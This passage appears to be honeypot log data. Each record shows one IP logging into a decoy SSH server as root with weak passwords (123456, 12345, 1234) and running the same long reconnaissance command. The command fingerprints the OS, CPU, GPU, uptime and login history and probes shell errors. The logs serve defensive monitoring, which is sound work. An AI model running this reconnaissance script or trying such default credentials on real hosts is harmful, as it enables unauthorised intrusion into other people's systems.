nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "RECONNAISSANCE",
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
91.92.40.7
2026-07-03 00:10:07.954930 UTC
RECONNAISSANCE COMMANDS RUN SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123456

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: d5a4235e697f
Client Version: SSH-2.0-Go
Engagement Duration: 2.0s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "d5a4235e697f",
  "src_ip": "91.92.40.7",
  "start_time": "2026-07-03T00:10:07.954930Z",
  "end_time": "2026-07-03T00:10:09.986092Z",
  "duration": "2.0",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123456"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "RECONNAISSANCE",
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
91.92.40.7
2026-07-03 00:08:27.137039 UTC
RECONNAISSANCE COMMANDS RUN SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 12345

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 1adac5c37369
Client Version: SSH-2.0-Go
Engagement Duration: 2.9s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "1adac5c37369",
  "src_ip": "91.92.40.7",
  "start_time": "2026-07-03T00:08:27.137039Z",
  "end_time": "2026-07-03T00:08:29.992104Z",
  "duration": "2.9",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "12345"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "RECONNAISSANCE",
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
91.92.40.7
2026-07-03 00:06:43.966236 UTC
RECONNAISSANCE COMMANDS RUN SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 1234

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 28bb84ab850d
Client Version: SSH-2.0-Go
Engagement Duration: 3.6s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "28bb84ab850d",
  "src_ip": "91.92.40.7",
  "start_time": "2026-07-03T00:06:43.966236Z",
  "end_time": "2026-07-03T00:06:47.518096Z",
  "duration": "3.6",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "1234"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
